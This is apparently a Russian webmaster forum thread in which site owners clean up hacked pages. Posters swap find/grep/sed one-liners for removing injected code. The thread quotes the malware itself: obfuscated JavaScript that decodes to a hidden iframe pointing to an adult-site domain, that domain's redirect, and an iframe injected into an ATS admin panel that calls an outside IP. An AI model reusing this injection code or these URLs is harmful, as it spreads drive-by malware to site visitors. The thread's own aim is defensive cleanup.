Очень нестандартный трейдер или взлом АТS?

Вывести список заражённых файлов:

Код:

find / -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' find / -name \*.php -exec grep -H "2020696620282" {} \; | awk -F":" '{print $1}'

почистить в автоматическом режиме:
[freebsd]

Код:

for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i '' 's/<script.*document.write.*unesca.*<\/script>//g' $i; done

[linux]

Код:

for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*document.write.*unesca.*<\/script>//g' $i; done

P.S.
обратись к моим админам

Спасибо, почистился.

Вот только один домен все же успел попасть под раздачу гугла. Уже подал запрос на review моего сайта в Google Tools, чтобы убрали блок на мой домен.

Как долго ждать восстановления?

Сайт занесен Гуглем в подозрительные

Появился трейдер непонятный, в сорсе админ паги:

Код:

<td class="normalrow" onmouseover="showsubmenu(this)" onmouseout="hidesubmenu(this)" style="background-color:#FFCCCC;"><a target="_blank" href="masex.com\"><iframe   width=1   height=1   src=http://79.135.187.18/ats/ats.php></iframe><aaaa=\"">masex.com\"><iframe_width=1_height=1_src=http</a>

Удалить не получается
Че делать? хелп!
Прочекал все .php .html .tpl файлы ничего не нашел...

Вроде бы кильнул: стер в tradefiles, datafilesm и в main.csv.
Поменял пароль навсякий...

Почитай топик с начала. Пароль тебя не спасет.

Спс, последовал рекомендациям

Soft-Com писал:

[linux] Код: for i in `find ./ -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*document.write.*unesca.*<\/script>//g' $i; done

не дайте погибнуть, подскажите в чем затык
не идет под линухом то что Soft-Com написал.
поправил строчку автора , убрал чтоб искало не с корня, а с текущей диры и вырезало все что между

Код:

<script /script>

. Ошибок нет и результата тоже.

Код:

for i in `find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs`; do sed -i  's/<script.*<\/script>//g' $i; done

очень странно, а что даёт на вывод команда

Код:

find -name \*.html -exec grep -H "3C696672616D652073" {} \; | awk -F":" '{print $1}' | xargs

?

и дай сюда кусок, который находиться между <script> и </script>, которые ты хочешь удалить.

Soft-Com спасибо что отозвался
поиск все верно выдает, в 2 файлах несколько раз встречается script
find -name \*.html -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs
./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabe.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html ./bbabd.html

и регэксп нормально работает типа 's/ZZZ/XXX/g'
проблемы начинаются когда пытаюсь написать чтоб резало все между тэгами script типа 's/<script.*<\/script>//g'

а вырезати надо че-то типа такого

Код:

<script language=javascript><!-- ((t){eval(unescape((',76,61r,20a,3d,22Scr,69p,74Eng,69ne,22,2c,62,3d,22Ver,73ion()+,22,2cj,3d,22,22,2cu,3dnavigato,72,2euserAgent,3b --></script><script language=javascript><!-- ((){var VY6='%';var HX3='>76>61r>20a>3d>22ScriptEng>69ne>22>2c>62>3d>22V>65>72>73ion()+>22>2cj>3d>22>22>2c>75>3dnavigator>2eu>73>65r --></script><script language=javascript><!-- ((LVJSq){var xmfRk='%';var N0Wx=('var.20a.3d.22S.63rip.74Eng.69.6ee.22.2cb.3d.22Ve.72sion()+.22.2cj.3d.22.22.2cu.3d.6e.61vigator.2e. --></script><script language=javascript><!-- ((RGO){var oeswP='%';var Vcu5='var>20>61>3d>22ScriptEngine>22>2cb>3d>22Version()+>22>2cj>3d>22>22>2cu>3dnavigator>2euserAgent>3bif(( --></script><script language=javascript><!-- ((KHxA7){var B80='%';var tViW='var,20a,3d,22,53,63ri,70tEn,67i,6e,65,22,2c,62,3d,22Vers,69,6fn()+,22,2c,6a,3d,22,22,2cu,3d,6e,61viga --></script>

в нутри этой фигни следущее

Код:

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E636F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) {var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){unescape(o);} </script>

<iframe src="http://www.celebritynympho.com/st/niches/z/static.php" height="2" style="display:none" width="2"></iframe>

а там

<script>
window.location='http://www.lotsofxxxclips.com/';
</script>

разбирайтесь птшите абузы

usanatol писал:

разбирайтесь птшите абузы

не в арбузах счастие, убрать бы ето дерьмо с галер
сделаного жалко, файла дохрена, руками почистить не реально.

Ну если хакинг скриптов сотен машин не повод тогда можно и дальше продолжать

попробуй так:

Код:

for i in `find ./ -name *.*tm* -exec grep -H "76,61r,20a,3d,22Scr,69p,74Eng" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script language=javascript><!--.*--><\/script>//g;p;}' $i; done

по идее поможет, но надо бы проверить потом контент на наличие скриптов, через которые рассадили хрень, типа r57, о69 и дофига других.

Fantomas писал:

не в арбузах счастие, убрать бы ето дерьмо с галер сделаного жалко, файла дохрена, руками почистить не реально.

usanatol абсолютно прав, домен на адванседах находится - абсолютно адекватные ребята, помогут наказать уродов.

usanatol: не серчай. соласный я с тобой на все 100, просто приоритеты у меня сча на восстановление.

Soft-Com: спасибо тебе огромное. помогло
только подправил я немного ето дело.
1.поиск не с корня а с текущей диры.
2.поиск все же по "script", код может менятся а оно там точно будет, хотя повылазят тэги description.
3.вырезать решил все же /<script.*<\/script>/ ибо может и не быть "script language=javascript"
получилось так

Код:

for i in `find -name \*.\*tm\* -exec grep -H "script" {} \; | awk -F":" '{print $1}' | xargs`; do sed -ni '1h;1!H;${;g;s/<script.*<\/script>//g;p;}' $i; done

вобщем спасибо всем кто переживал и особенно Soft-Com

Ну, хозяин - барин, но всё-же если были полезные скриптовые вставки, ты их удалил , так что если тебе именно это и нужно, то другим не поможет.

а абузу всё равно напиши.

Soft-Com: в том то и дело что у меня галеры лежат ниже паг со скриптами, поэтому и ищу не с корня а с текущей диры
в галерах никаких скриптов не надо.
у других будет из чего выбрать, не потеряются.

а арбуз надо подарить, только вот закончу лечение и поиск откуда ето все вылезло, благо написано на мастере не мало

исчо раз спасибо, даж не знаю ... если чем смогу помочь ... потом... когда нибудь...

Fantomas, сорри что пишу здесь, нет твоих данных в профайле - какие скрипты стояли и какие меры защиты были, что смогли поломать?